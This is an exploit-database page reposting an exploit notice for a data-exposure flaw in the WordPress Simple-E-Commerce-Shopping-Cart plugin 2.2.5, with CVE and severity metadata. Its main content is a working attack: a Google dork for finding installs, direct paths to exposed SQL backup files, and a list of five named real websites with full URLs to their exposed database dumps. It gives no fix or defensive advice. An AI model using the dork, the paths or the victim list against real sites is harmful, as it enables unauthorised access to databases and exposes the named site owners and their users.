Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2020-21097 | CWE-264 | Not specified | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Abdullah Alfiristio | High | Remote | 2018-12-12 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 0.02192 | 0.50148 |
################################################################################################# # Exploit Title : WordPress Simple-E-Commerce-Shopping-Cart Plugins 2.2.5 Database Backup Disclosure # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 08/12/2018 # Vendor Homepage : wordpress.org/plugins/simple-e-commerce-shopping-cart/ # Owner of the Script : Niaz Showket # Software Download Link : downloads.wordpress.org/plugin/simple-e-commerce-shopping-cart.zip # Tested On : Windows and Linux # Category : WebApps # Version Information : 2.2.5 # Exploit Risk : Medium # Google Dorks : inurl:''/wp-content/plugins/simple-e-commerce-shopping-cart/'' intext:''Copyright Ike Amadi 2010-2016 - All Rights Reserved'' intext:''Designed by More Please Productions'' intext:''Theme: Nikkon by Kaira'' # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ] ################################################################################################# + WordPress Simple Ecommerce Shopping Cart Plugin- Sell products through Paypal ################################################################################################# # Admin Panel Login Path : /wp-login.php # Exploit : /wp-content/plugins/simple-e-commerce-shopping-cart/sql/database.sql /wp-content/plugins/simple-e-commerce-shopping-cart/sql/uninstall.sql ################################################################################################# # Example Vulnerable Sites => [+] printforcardealers.com/wp-content/plugins/simple-e-commerce-shopping-cart/sql/database.sql [+] dev.vanderbecktree.com/dripwp.bkp_Apr2/wp-content/plugins/simple-e-commerce-shopping-cart/sql/database.sql [+] morepleaseproductions.com/squeeze/wp-content/plugins/simple-e-commerce-shopping-cart/sql/database.sql [+] ikeamadi.org/wp-content/plugins/simple-e-commerce-shopping-cart/sql/database.sql [+] reckionline.de/wp-content/plugins/simple-e-commerce-shopping-cart/sql/database.sql ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.